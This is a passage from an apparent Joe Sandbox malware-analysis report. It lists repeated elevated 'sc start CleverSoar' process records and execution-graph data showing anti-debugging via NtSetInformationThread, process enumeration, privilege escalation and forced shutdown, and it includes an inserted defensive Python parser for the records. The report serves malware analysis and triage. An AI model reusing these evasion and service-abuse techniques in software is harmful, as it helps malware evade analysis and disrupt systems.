                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:98
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:99
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:100
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:101
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:102
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:103
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:104
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:105
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:106
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:107
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:108
                            Start time:23:01:58
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:267
                            Start time:23:02:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\Conhost.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false
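Triage helper for the process records above, added here as an example; it is not part of the Joe Sandbox report or of the analysed sample. It parses the plain "Key:Value" records into dicts (splitting only at the first colon, so start times and drive letters survive), collapses the repeated cmd -> sc pairs into one count per service name while showing which image issued each `sc start`, separates conhost.exe (the console window host Windows attaches to every console process, always with `0xffffffff -ForceV1`) from the processes the sample itself launched, and reports records with empty fields such as Target 267, which was still running when the analysis ended. The three embedded records are abridged copies of Targets 102, 103 and 267 from the listing (a few fields dropped for length); the function names are the example's own.

```python
import re
from collections import Counter

# Constructed input: Targets 102, 103 and 267 from the listing above, abridged,
# in the plain "Key:Value" layout the report uses. Empty fields stay empty.
SAMPLE_RECORDS = r"""
Target ID:102
Start time:23:01:57
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /c start sc start CleverSoar
Imagebase:0x7ff71a860000
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Has exited:true

Target ID:103
Start time:23:01:57
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start CleverSoar
Imagebase:0x7ff734b60000
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Has exited:true

Target ID:267
Start time:23:02:04
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Has exited:false
"""

# 'sc start <name>', whether typed directly or wrapped in 'cmd /c start ...'.
SERVICE_START = re.compile(r"\bsc(?:\.exe)?\s+start\s+(\S+)", re.IGNORECASE)
# Arguments Windows gives the console host it attaches to each console process.
CONHOST_ARGS = "0xffffffff -ForceV1"


def parse_records(text):
    """Blank-line separated records -> list of dicts. Split at the first ':' only,
    so 'Start time:23:01:57' and the drive letter in 'Path' keep their values."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            if ":" in line:
                key, value = line.strip().split(":", 1)
                rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def missing_fields(record):
    """Keys with no value (Target 267 was still running when analysis ended)."""
    return [k for k, v in record.items() if v == ""]


def is_console_host(record):
    """conhost.exe with the standard arguments is process-tree noise, not a
    child the sample chose to run."""
    path = record.get("Path", "").lower()
    return path.endswith("\\conhost.exe") and CONHOST_ARGS in record.get("Commandline", "")


def service_start_attempts(records):
    """Count 'sc start' per service and per launching image. The cmd and the sc
    record of one attempt both match, so the per-image view gives the real count."""
    per_service, per_image = Counter(), Counter()
    for rec in records:
        m = SERVICE_START.search(rec.get("Commandline", ""))
        if m:
            image = rec.get("Path", "").rsplit("\\", 1)[-1].lower()
            per_service[m.group(1)] += 1
            per_image[f"{image} -> {m.group(1)}"] += 1
    return dict(per_service), dict(per_image)


def summarize(records):
    """The few facts a triager wants from the listing, in one dict."""
    per_service, per_image = service_start_attempts(records)
    return {
        "processes": len(records),
        "console_hosts": sum(is_console_host(r) for r in records),
        "service_starts": per_service,
        "service_starts_by_image": per_image,
        "elevated": [r["Target ID"] for r in records if r.get("Has elevated privileges") == "true"],
        "incomplete": {r["Target ID"]: missing_fields(r) for r in records if missing_fields(r)},
    }


if __name__ == "__main__":
    for key, value in summarize(parse_records(SAMPLE_RECORDS)).items():
        print(f"{key}: {value}")
```

Run against the full listing, the per-image view shows that every `sc start CleverSoar` appears twice (once as the cmd wrapper, once as sc.exe itself), so the number of sc.exe records, not the number of matching command lines, is the number of start attempts.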


                              Execution Graph

                              Execution Coverage:2.3%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.5%
                              Total number of Nodes:818
                              Total number of Limit Nodes:9
                              execution_graph (node/edge data behind the interactive graph view: node id, code address and the Win32/CRT calls resolved at that node; only the API call chains recorded in the nodes are kept here)

                              Anti-debug: GetCurrentThread -> NtSetInformationThread (6c0a3e8a), hiding the thread from the debugger
                              Service control: OpenSCManagerA (6c225120) -> OpenServiceA (6c2251e8)
                              Process enumeration: CreateToolhelp32Snapshot (6c225240) -> Process32FirstW (6c225345) / Process32NextW (6c225320) -> CloseHandle (6c225277)
                              Privilege adjustment then power action: GetCurrentProcess -> OpenProcessToken -> LookupPrivilegeValueW -> AdjustTokenPrivileges -> NtInitiatePowerAction (6c225d60, reached from four separate code paths)
                              Shutdown: ExitWindowsEx followed by Sleep (6c0afbe8)
                              Self-termination: GetCurrentProcess -> TerminateProcess (6c0ae8dd)
                              Child process: CreateProcessA (6c224ff0) -> WaitForSingleObject, CloseHandle, CloseHandle (6c225080), called from many nodes of the main routine
                              File system: FindFirstFileA (6c21aed6) -> FindClose (6c21af14); CreateFileA -> CloseHandle (6c0a5164); a file I/O routine (6c1fb730) using CreateFileA (6c1fbced), WriteFile x3 and ReadFile (6c1fc1e0, 6c1fb3e9, 6c1fb43d, 6c1fab95)
                              Delays: Sleep at 6c0b37d0, 6c0b2452 and 6c0aed02 inside the main loops
                              Graph entry points: 6c23cad3 (CRT read path: GetConsoleMode, ReadConsoleW, ReadFile), 6c0a3d62 (anti-debug), 6c0a4b53 and 6c0b4a27 (main logic, both routed through the allocator/exception helper 6c226a43: IsProcessorFeaturePresent, RaiseException, EnterCriticalSection, LeaveCriticalSection, std::_Facet_Register)
                              The remaining nodes are MSVC runtime internals (__wsopen_s, __dosmaperr, __fassign, __Getctype, std::ios_base::_Ios_base_dtor, std::locale::_Setgloballocale, _Yarn, _strlen, _free) wrapping CreateFileW, GetFileType, SetStdHandle, MultiByteToWideChar, WriteFile, HeapFree, GetLastError/SetLastError and critical-section locking.
67461->67463 67462 6c0b6624 67464 6c226a43 std::_Facet_Register 4 API calls 67462->67464 67469 6c0b65bc _Yarn _strlen 67463->67469 67464->67469 67465->67446 67465->67461 67465->67462 67465->67469 67466 6c0c63b2 67537 6c0a15e0 18 API calls std::ios_base::_Ios_base_dtor 67466->67537 67467 6c0b9bbd GetCurrentProcess TerminateProcess 67467->67459 67469->67466 67471 6c0b6989 67469->67471 67472 6c0b6970 67469->67472 67475 6c0b6920 _Yarn 67469->67475 67470 6c0c64f8 67474 6c226a43 std::_Facet_Register 4 API calls 67471->67474 67473 6c226a43 std::_Facet_Register 4 API calls 67472->67473 67473->67475 67474->67475 67476 6c225960 104 API calls 67475->67476 67480 6c0b69d6 std::ios_base::_Ios_base_dtor _strlen 67476->67480 67477->67446 67477->67459 67477->67466 67477->67467 67495 6c226a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 67477->67495 67525 6c225960 104 API calls 67477->67525 67535 6c224ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 67477->67535 67479 6c0bf243 CreateFileA 67478->67479 67490 6c0bf2a7 67479->67490 67480->67446 67481 6c0b6dbb 67480->67481 67482 6c0b6dd2 67480->67482 67494 6c0b6d69 _Yarn _strlen 67480->67494 67483 6c226a43 std::_Facet_Register 4 API calls 67481->67483 67485 6c226a43 std::_Facet_Register 4 API calls 67482->67485 67483->67494 67484 6c0c02ca 67485->67494 67486 6c0b7440 67489 6c226a43 std::_Facet_Register 4 API calls 67486->67489 67487 6c0b7427 67488 6c226a43 std::_Facet_Register 4 API calls 67487->67488 67491 6c0b73da _Yarn 67488->67491 67489->67491 67490->67484 67492 6c0c02ac GetCurrentProcess TerminateProcess 67490->67492 67493 6c225960 104 API calls 67491->67493 67492->67484 67496 6c0b748d std::ios_base::_Ios_base_dtor _strlen 67493->67496 67494->67466 67494->67486 67494->67487 67494->67491 67495->67477 67496->67446 67497 6c0b79a8 67496->67497 67498 6c0b7991 67496->67498 67505 6c0b7940 _Yarn _strlen 67496->67505 67500 6c226a43 std::_Facet_Register 4 API calls 
67497->67500 67499 6c226a43 std::_Facet_Register 4 API calls 67498->67499 67499->67505 67500->67505 67501 6c0b7dc9 67503 6c226a43 std::_Facet_Register 4 API calls 67501->67503 67502 6c0b7de2 67504 6c226a43 std::_Facet_Register 4 API calls 67502->67504 67506 6c0b7d7c _Yarn 67503->67506 67504->67506 67505->67466 67505->67501 67505->67502 67505->67506 67507 6c225960 104 API calls 67506->67507 67508 6c0b7e2f std::ios_base::_Ios_base_dtor _strlen 67507->67508 67508->67446 67509 6c0b85a8 67508->67509 67510 6c0b85bf 67508->67510 67513 6c0b8556 _Yarn _strlen 67508->67513 67512 6c226a43 std::_Facet_Register 4 API calls 67509->67512 67511 6c226a43 std::_Facet_Register 4 API calls 67510->67511 67511->67513 67512->67513 67513->67466 67514 6c0b896a 67513->67514 67515 6c0b8983 67513->67515 67518 6c0b891d _Yarn 67513->67518 67516 6c226a43 std::_Facet_Register 4 API calls 67514->67516 67517 6c226a43 std::_Facet_Register 4 API calls 67515->67517 67516->67518 67517->67518 67519 6c225960 104 API calls 67518->67519 67522 6c0b89d0 std::ios_base::_Ios_base_dtor _strlen 67519->67522 67520 6c0b8f1f 67523 6c226a43 std::_Facet_Register 4 API calls 67520->67523 67521 6c0b8f36 67524 6c226a43 std::_Facet_Register 4 API calls 67521->67524 67522->67446 67522->67520 67522->67521 67526 6c0b8ecd _Yarn _strlen 67522->67526 67523->67526 67524->67526 67525->67477 67526->67466 67527 6c0b936d 67526->67527 67528 6c0b9354 67526->67528 67531 6c0b9307 _Yarn 67526->67531 67530 6c226a43 std::_Facet_Register 4 API calls 67527->67530 67529 6c226a43 std::_Facet_Register 4 API calls 67528->67529 67529->67531 67530->67531 67532 6c225960 104 API calls 67531->67532 67534 6c0b93ba std::ios_base::_Ios_base_dtor 67532->67534 67533 6c224ff0 4 API calls 67533->67459 67534->67446 67534->67533 67535->67477 67537->67470 67538 6c22ef3f 67539 6c22ef4b __wsopen_s 67538->67539 67540 6c22ef52 GetLastError ExitThread 67539->67540 67541 6c22ef5f 67539->67541 67542 6c2349b2 __Getctype 37 API calls 67541->67542 67543 6c22ef64 
67542->67543 67550 6c239d66 67543->67550 67547 6c22ef7b 67556 6c22eeaa 16 API calls 2 library calls 67547->67556 67549 6c22ef9d 67551 6c22ef6f 67550->67551 67552 6c239d78 GetPEB 67550->67552 67551->67547 67555 6c236d6f 5 API calls std::_Lockit::_Lockit 67551->67555 67552->67551 67553 6c239d8b 67552->67553 67557 6c236e18 5 API calls std::_Lockit::_Lockit 67553->67557 67555->67547 67556->67549 67557->67551
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
• Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: HR^
                              • API String ID: 4218353326-1341859651
                              • Opcode ID: 3bb6c30176b09bf77ed942acb5593505aae0025439673284a3c277be0d4756fa
                              • Instruction ID: 084e4ed551efe96f837bce5a5e19af6380a319fb4aec19557862a962ac3cbe25
                              • Opcode Fuzzy Hash: 3bb6c30176b09bf77ed942acb5593505aae0025439673284a3c277be0d4756fa
                              • Instruction Fuzzy Hash: 10742671644B018FC728CF68C8D0795B7F3EF95318B598A2DC0A68BA96E735B54BCB40
                              Strings
Memory Dump Source
• Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
• Associated dumps and Joe Sandbox IDA Plugin snapshot file: identical to the first function block above (hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd)
                              Similarity
                              • API ID:
                              • String ID: }jk$;T55$L@^
                              • API String ID: 0-4218709813
                              • Opcode ID: e976bb2726d48805f4e8c8f1029d4ff4385766d85c58de127118ef07b17e6391
                              • Instruction ID: ccf8b9276bfe2dd99f6e2bb7ecdee9d0c7bb5bac058551210858f9cd87219a31
                              • Opcode Fuzzy Hash: e976bb2726d48805f4e8c8f1029d4ff4385766d85c58de127118ef07b17e6391
                              • Instruction Fuzzy Hash: 81344871644B018FC728CF28C8D0B96B7F3EF95318B598A6DC0A69BB55E735B50ACB40

Control-flow Graph

Function at 6c225240 (the plugin's block list and executed/not-executed colouring are not reproduced). The entry block 6c225240-6c225275 calls CreateToolhelp32Snapshot and falls into a dispatch block at 6c2252a0-6c2252a9 to which every path returns. From the dispatcher: block 6c225334-6c22535d calls 6c22b920 and then Process32FirstW; block 6c225320-6c225332 calls Process32NextW; block 6c225277-6c225292 calls CloseHandle; block 6c225377-6c2253a1 calls 6c232c05. The remaining blocks between 6c2252ab and 6c2253bf are compare-and-branch stubs with no calls.
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C22524E
Memory Dump Source
• Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
• Associated dumps and Joe Sandbox IDA Plugin snapshot file: identical to the first function block above (hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd)
                              Similarity
                              • API ID: CreateSnapshotToolhelp32
                              • String ID:
                              • API String ID: 3332741929-0
                              • Opcode ID: 34e9c21f48b891e1fa07d75ffb0f66fcd430c47b452d59ffe03898a11bddccb3
                              • Instruction ID: 457402c7d6e39299bdb13b1f3cf328dcec2585825da3fe33ff1e911cd5fd1a39
                              • Opcode Fuzzy Hash: 34e9c21f48b891e1fa07d75ffb0f66fcd430c47b452d59ffe03898a11bddccb3
                              • Instruction Fuzzy Hash: 8B315E756083059FD7109F28C888B1ABBF4AF99745F508A3DF898C73A4D379D8488B52

Control-flow Graph

Function at 6c0a3886 (block list not reproduced). The body is a web of small compare-and-branch blocks between 6c0a383b and 6c0a414b. Only four blocks call anything: three call sites to 6c1f1470 followed by 6c1f1480 (blocks 6c0a383b-6c0a3855, 6c0a3bc0-6c0a3bda and 6c0a3eea-6c0a3f04) and the block 6c0a3e81-6c0a3ee0, which calls 6c0a3750, GetCurrentThread and NtSetInformationThread (the plugin's APIs entry for this call site: GetCurrentThread at 6C0A3E9D, NtSetInformationThread at 6C0A3EAA).
Memory Dump Source
• Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
• Associated dumps and Joe Sandbox IDA Plugin snapshot file: identical to the first function block above (hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd)
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1ad7069380a8e4c9bdf868c9d7ccfd3cecb3aafce27ba40e486e6975387efafb
                              • Instruction ID: 3347cb8e765c9f6eae2040279c95ccff79a729c75217e70635643e5ad85bd8cb
                              • Opcode Fuzzy Hash: 1ad7069380a8e4c9bdf868c9d7ccfd3cecb3aafce27ba40e486e6975387efafb
                              • Instruction Fuzzy Hash: C532C132245B018FC324CFA8C890795B7E3EFD93147698A6CC0EA5BA96D775B44BCB50

Control-flow Graph

The same function body as the preceding graph, listed again from the entry block 6c0a3a6a-6c0a3a85 (block list not reproduced): identical blocks, the same three 6c1f1470/6c1f1480 call sites (6c0a383b-6c0a3855, 6c0a3bc0-6c0a3bda, 6c0a3eea-6c0a3f04) and the same block 6c0a3e81-6c0a3ee0 calling 6c0a3750, GetCurrentThread and NtSetInformationThread.
                              APIs
Memory Dump Source
• Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
• Associated dumps and Joe Sandbox IDA Plugin snapshot file: identical to the first function block above (hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd)
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 95f25a630cec715fcbae76dde6e96dcace934cc5af6f5f996d2d49af1c2a5636
                              • Instruction ID: 0150066158d90c9b169bb73df025db986f5fc10ef639a488303d54b3c53de651
                              • Opcode Fuzzy Hash: 95f25a630cec715fcbae76dde6e96dcace934cc5af6f5f996d2d49af1c2a5636
                              • Instruction Fuzzy Hash: 2451DF711547018FC320CFA8C880785B7E3BF99314F698A5DC0E65BA96DB75B44BCB41
                              APIs
Memory Dump Source
• Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
• Associated dumps and Joe Sandbox IDA Plugin snapshot file: identical to the first function block above (hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd)
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 30a02efbc8b9040dd50b473cbc8cf753d7492869692532900d736b06b8a1a10c
                              • Instruction ID: 1f78c51edcfab52e32089f55a80f9a7a8666bb714da0b80642495719479c5c3e
                              • Opcode Fuzzy Hash: 30a02efbc8b9040dd50b473cbc8cf753d7492869692532900d736b06b8a1a10c
                              • Instruction Fuzzy Hash: 5751D171514B018BC320CFE8C48079AB7E3BF99314F698A1DC0E65BA96DB71B44BCB91
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C0A3E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C0A3EAA
Memory Dump Source
• Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
• Associated dumps and Joe Sandbox IDA Plugin snapshot file: identical to the first function block above (hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd)
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: b4a539c0f58effc4df311dc2d6538bc913274ad0fabd94adcadc1a375da21696
                              • Instruction ID: c881dda3b95cd9afb7d0f6b79a7f271e8e944a3cb55c12570fdf39606276ff94
                              • Opcode Fuzzy Hash: b4a539c0f58effc4df311dc2d6538bc913274ad0fabd94adcadc1a375da21696
                              • Instruction Fuzzy Hash: 18310331115B01CBC720CFE4C8847CAB7E3AF9A314F698A1DC0E65BA92DB75B00A9B51
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C0A3E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C0A3EAA
Memory Dump Source
• Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
• Associated dumps and Joe Sandbox IDA Plugin snapshot file: identical to the first function block above (hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd)
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 61b2ce54b9420a43dc8af62e47d408c127e04543c7d39d7ff1c21a07d8a81528
                              • Instruction ID: c29e77db883da7e74f2fe51f1502e7cc781b6c0be238b1b4f156756f17c62b5f
                              • Opcode Fuzzy Hash: 61b2ce54b9420a43dc8af62e47d408c127e04543c7d39d7ff1c21a07d8a81528
                              • Instruction Fuzzy Hash: 8B31F331114701CBC724CFE8C49079AB7E7AF9A304F654E1DC0E65BA96DB71B446CB91
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C0A3E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C0A3EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: c9af61170ad605ded199556893e910db5632914d60a591d48025576f9da9440c
                              • Instruction ID: dac5790766abd458da8e4f3fd50a1e81208daf140eedf89b155ea12362fbbb76
                              • Opcode Fuzzy Hash: c9af61170ad605ded199556893e910db5632914d60a591d48025576f9da9440c
                              • Instruction Fuzzy Hash: 13212470118701DBC724CFE4C89079AB7F6AF8A304F644A1DC0E68BAD2DF75B40A9B52
                              APIs
                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C225130
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: d8643c20d75e9d86550136a2571cbf9daeb948cb28e38c4b71e7c38f958d0f00
                              • Instruction ID: dd683c2e98fb03538cb6ead6a93a74daed24fb304fc6b45b881b0f62211e253e
                              • Opcode Fuzzy Hash: d8643c20d75e9d86550136a2571cbf9daeb948cb28e38c4b71e7c38f958d0f00
                              • Instruction Fuzzy Hash: B0312AB4608346EFD710CF28C544B1ABBF0EB89755F50896EF888C6364C379C9459B53
                              APIs
                              • FindFirstFileA.KERNEL32(?,?), ref: 6C21AEDC
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: cb14118e0b088aa6f02425ff232c7706d1f6a86f93137225212225e7e3b6b16f
                              • Instruction ID: 56a760b02de19ce24964b67e7195bf327407ba814726fe753ba8392a87e02dd7
                              • Opcode Fuzzy Hash: cb14118e0b088aa6f02425ff232c7706d1f6a86f93137225212225e7e3b6b16f
